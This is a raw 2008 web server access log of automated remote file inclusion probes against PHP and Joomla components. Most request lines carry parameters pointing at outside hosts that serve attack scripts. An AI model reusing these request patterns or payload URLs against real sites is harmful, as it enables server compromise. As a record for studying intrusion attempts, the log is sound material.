75.126.158.150 - - [30/Apr/2008:10:00:41 -0700] "GET //Neos_Chronos/header.php?base_folder=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:10:00:41 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:10:00:46 -0700] "GET /logs/access_080224.log//Neos_Chronos/header.php?base_folder=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:10:00:46 -0700] "GET //Neos_Chronos/header.php?base_folder=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:10:00:46 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.111.173.45 - - [30/Apr/2008:10:00:58 -0700] "GET /logs/access.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.softsearch.co.kr/bemarket/goods/tes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.45 - - [30/Apr/2008:10:00:58 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.softsearch.co.kr/bemarket/goods/tes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:10:01:04 -0700] "GET /logs/access_071220.log//Neos_Chronos/header.php?base_folder=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:10:01:15 -0700] "GET /logs/access_071220.log//Neos_Chronos/header.php?base_folder=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.141.117.79 - - [30/Apr/2008:10:01:29 -0700] "GET /logs/access_071218.log//spaw_control.class.php?spaw_root=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.141.117.79 - - [30/Apr/2008:10:01:30 -0700] "GET //spaw_control.class.php?spaw_root=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.141.117.79 - - [30/Apr/2008:10:01:30 -0700] "GET /logs//spaw_control.class.php?spaw_root=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:10:02:09 -0700] "GET /logs/access_071218.log//spaw_control.class.php?spaw_root=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:10:02:09 -0700] "GET //spaw_control.class.php?spaw_root=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:10:02:09 -0700] "GET /logs//spaw_control.class.php?spaw_root=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.27.209.11 - - [30/Apr/2008:10:02:18 -0700] "GET //ashnews.php?pathtoashnews=http://yudz.110mb.com/docs/heer.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.91.145.249 - - [30/Apr/2008:10:02:23 -0700] "GET /logs/access_071219.log/inc/cmses/aedatingCMS.php?dir[inc]=http://www.vspbilgisayar.com/fuckrox-id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.91.145.249 - - [30/Apr/2008:10:02:23 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://www.vspbilgisayar.com/fuckrox-id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.91.145.249 - - [30/Apr/2008:10:02:23 -0700] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://www.vspbilgisayar.com/fuckrox-id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.218.248.94 - - [30/Apr/2008:10:02:37 -0700] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://amsny.org/site/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
206.104.21.198 - - [30/Apr/2008:10:03:06 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://benedon.net/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.104.21.198 - - [30/Apr/2008:10:03:06 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://benedon.net/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.104.21.198 - - [30/Apr/2008:10:03:07 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://benedon.net/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.104.21.198 - - [30/Apr/2008:10:03:07 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://benedon.net/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.218.248.94 - - [30/Apr/2008:10:03:07 -0700] "GET /logs/access.log/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://amsny.org/site/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
207.218.248.94 - - [30/Apr/2008:10:03:07 -0700] "GET /logs/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://amsny.org/site/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
206.104.21.198 - - [30/Apr/2008:10:03:09 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://benedon.net/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.109.167.35 - - [30/Apr/2008:10:03:14 -0700] "GET /logs/access_080215.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.167.35 - - [30/Apr/2008:10:03:17 -0700] "GET /////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:10:03:19 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:10:03:19 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
86.109.167.35 - - [30/Apr/2008:10:03:19 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 45419 "-" "libwww-perl/5.79" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:10:03:19 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
86.109.167.35 - - [30/Apr/2008:10:03:23 -0700] "GET /logs/access_080215.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:10:03:28 -0700] "GET /logs/access_071218.log//spaw_control.class.php?spaw_root=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:10:03:28 -0700] "GET //spaw_control.class.php?spaw_root=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:10:03:28 -0700] "GET /logs//spaw_control.class.php?spaw_root=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.233.12.225 - - [30/Apr/2008:10:04:31 -0700] "GET /logs/access_080220.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.127.253.161 - - [30/Apr/2008:10:04:32 -0700] "GET /logs/access_080220.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.167.35 - - [30/Apr/2008:10:04:36 -0700] "GET /logs/access.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.93.123 - - [30/Apr/2008:10:04:41 -0700] "GET /logs/access_080129.log//plugins/spamx/DeleteComment.Action.class.php?_CONF[path]=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
89.108.93.123 - - [30/Apr/2008:10:04:41 -0700] "GET /logs//plugins/spamx/DeleteComment.Action.class.php?_CONF[path]=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
70.91.145.249 - - [30/Apr/2008:10:04:50 -0700] "GET /logs/access_080218.log/inc/cmses/aedatingCMS.php?dir[inc]=http://www.vspbilgisayar.com/fuckrox-id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:10:04:58 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:10:04:58 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:10:04:59 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.185 - - [30/Apr/2008:10:05:15 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.18.170 - - [30/Apr/2008:10:05:16 -0700] "GET /logs/access_080127.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.141.117.79 - - [30/Apr/2008:10:05:58 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.141.117.79 - - [30/Apr/2008:10:05:58 -0700] "GET //ashnews.php?pathtoashnews=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.141.117.79 - - [30/Apr/2008:10:05:58 -0700] "GET /logs//ashnews.php?pathtoashnews=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.218.248.94 - - [30/Apr/2008:10:06:04 -0700] "GET /com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://amsny.org/site/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.63.16.134 - - [30/Apr/2008:10:06:11 -0700] "GET /logs//main.php?sayfa=http://contactcraze.com/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.63.16.134 - - [30/Apr/2008:10:06:11 -0700] "GET //main.php?sayfa=http://contactcraze.com/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.218.248.94 - - [30/Apr/2008:10:06:19 -0700] "GET /logs/access.log/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://amsny.org/site/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
207.218.248.94 - - [30/Apr/2008:10:06:20 -0700] "GET /logs/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://amsny.org/site/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
207.218.248.94 - - [30/Apr/2008:10:06:45 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://amsny.org/site/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
207.218.248.94 - - [30/Apr/2008:10:07:11 -0700] "GET /logs/access.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://amsny.org/site/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
207.218.248.94 - - [30/Apr/2008:10:07:11 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://amsny.org/site/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.141.117.79 - - [30/Apr/2008:10:07:23 -0700] "GET /logs/access_071225.log//spaw_control.class.php?spaw_root=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:10:07:44 -0700] "GET /logs/access_071225.log//spaw_control.class.php?spaw_root=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:10:08:11 -0700] "GET /logs/access_080309.log//newspublish/include.php?path%5Bdocroot%5D=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.82.115.21 - - [30/Apr/2008:10:09:01 -0700] "GET /logs/access_080223.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.chandonai.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.82.115.21 - - [30/Apr/2008:10:09:02 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.chandonai.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.82.115.21 - - [30/Apr/2008:10:09:02 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.chandonai.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
202.179.180.45 - - [30/Apr/2008:10:09:06 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" "www.dmulk.com"
202.179.180.45 - - [30/Apr/2008:10:09:09 -0700] "GET / HTTP/1.1" 200 11606 "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" "www.dmulk.com"
80.82.115.21 - - [30/Apr/2008:10:09:12 -0700] "GET /logs/access_080227.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.chandonai.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
72.36.175.10 - - [30/Apr/2008:10:09:19 -0700] "GET /logs/access_080223.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.buyindianproducts.com/includes/font/goodid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.36.175.10 - - [30/Apr/2008:10:09:19 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.buyindianproducts.com/includes/font/goodid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.36.175.10 - - [30/Apr/2008:10:09:19 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.buyindianproducts.com/includes/font/goodid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.36.175.10 - - [30/Apr/2008:10:09:27 -0700] "GET /logs/access_080227.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.buyindianproducts.com/includes/font/goodid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.74.9.26 - - [30/Apr/2008:10:09:40 -0700] "GET /logs/access_080215.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.74.9.26 - - [30/Apr/2008:10:09:43 -0700] "GET /////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
208.74.9.26 - - [30/Apr/2008:10:09:43 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 45419 "-" "libwww-perl/5.805" "www.dmulk.com"
66.151.162.98 - - [30/Apr/2008:10:09:49 -0700] "GET /logs/access_080315.log//atom.php5?page=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:10:10:06 -0700] "GET /logs/access_071229.log/display.php?table=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:10:10:06 -0700] "GET /display.php?table=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:10:10:06 -0700] "GET /logs/display.php?table=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.179.164.134 - - [30/Apr/2008:10:10:08 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.loader.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.179.164.134 - - [30/Apr/2008:10:10:09 -0700] "GET //ashnews.php?pathtoashnews=http://www.loader.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.179.164.134 - - [30/Apr/2008:10:10:09 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.loader.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:10:10:10 -0700] "GET /logs/access_071225.log//spaw_control.class.php?spaw_root=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:10:10:15 -0700] "GET /logs/access_071229.log/display.php?table=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:10:10:15 -0700] "GET /display.php?table=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:10:10:15 -0700] "GET /logs/display.php?table=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.74.9.26 - - [30/Apr/2008:10:10:23 -0700] "GET /logs/access_080215.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.93.123 - - [30/Apr/2008:10:10:26 -0700] "GET /logs/access_080104.log//plugins/spamx/DeleteComment.Action.class.php?_CONF[path]=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
67.15.8.53 - - [30/Apr/2008:10:10:33 -0700] "GET /logs/access_080315.log//atom.php5?page=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.36.175.10 - - [30/Apr/2008:10:10:34 -0700] "GET /logs/access.log/index.php?sayfa=http://www.buyindianproducts.com/includes/font/goodid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.27.59.13 - - [30/Apr/2008:10:10:36 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.geocities.com/cmd182182/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.27.59.13 - - [30/Apr/2008:10:10:36 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.geocities.com/cmd182182/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.36.175.10 - - [30/Apr/2008:10:10:37 -0700] "GET /index.php?sayfa=http://www.buyindianproducts.com/includes/font/goodid.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
72.36.175.10 - - [30/Apr/2008:10:10:37 -0700] "GET /logs/index.php?sayfa=http://www.buyindianproducts.com/includes/font/goodid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
210.205.6.175 - - [30/Apr/2008:10:10:58 -0700] "GET /logs/access_080218.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:10:11:10 -0700] "GET /logs/access_080309.log//newspublish/include.php?path%5Bdocroot%5D=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.139.67.2 - - [30/Apr/2008:10:11:15 -0700] "GET /Mailer.class.php?mosConfig_absolute_path=http://thetestingcompany.com//cache/rotest.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
216.139.67.2 - - [30/Apr/2008:10:11:15 -0700] "GET /logs/Mailer.class.php?mosConfig_absolute_path=http://thetestingcompany.com//cache/rotest.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
206.104.21.198 - - [30/Apr/2008:10:11:18 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://benedon.net/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.104.21.198 - - [30/Apr/2008:10:11:18 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://benedon.net/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.104.21.198 - - [30/Apr/2008:10:11:23 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://benedon.net/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.74.9.26 - - [30/Apr/2008:10:11:28 -0700] "GET /logs/access.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:10:11:36 -0700] "GET /logs/access.log/index.php?sayfa=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:10:11:40 -0700] "GET /index.php?sayfa=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
89.108.66.83 - - [30/Apr/2008:10:11:40 -0700] "GET /logs/access_071229.log/display.php?table=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:10:11:40 -0700] "GET /logs/index.php?sayfa=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:10:11:40 -0700] "GET /logs/access.log/index.php?sayfa=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.108.66.83 - - [30/Apr/2008:10:11:40 -0700] "GET /display.php?table=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.83 - - [30/Apr/2008:10:11:42 -0700] "GET /logs/display.php?table=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:10:11:44 -0700] "GET /index.php?sayfa=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:10:11:44 -0700] "GET /logs/index.php?sayfa=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.151.162.98 - - [30/Apr/2008:10:11:52 -0700] "GET /logs/access_080324.log//atom.php5?page=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.91.145.249 - - [30/Apr/2008:10:11:58 -0700] "GET /logs/access_080218.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.vspbilgisayar.com/fuckrox-id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:10:11:59 -0700] "GET /logs/access.log//agendax/addevent.inc.php?agendax_path=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:10:11:59 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:10:11:59 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.82.115.21 - - [30/Apr/2008:10:12:11 -0700] "GET /logs/access.log/index.php?sayfa=http://www.chandonai.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.82.115.21 - - [30/Apr/2008:10:12:16 -0700] "GET /logs/index.php?sayfa=http://www.chandonai.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
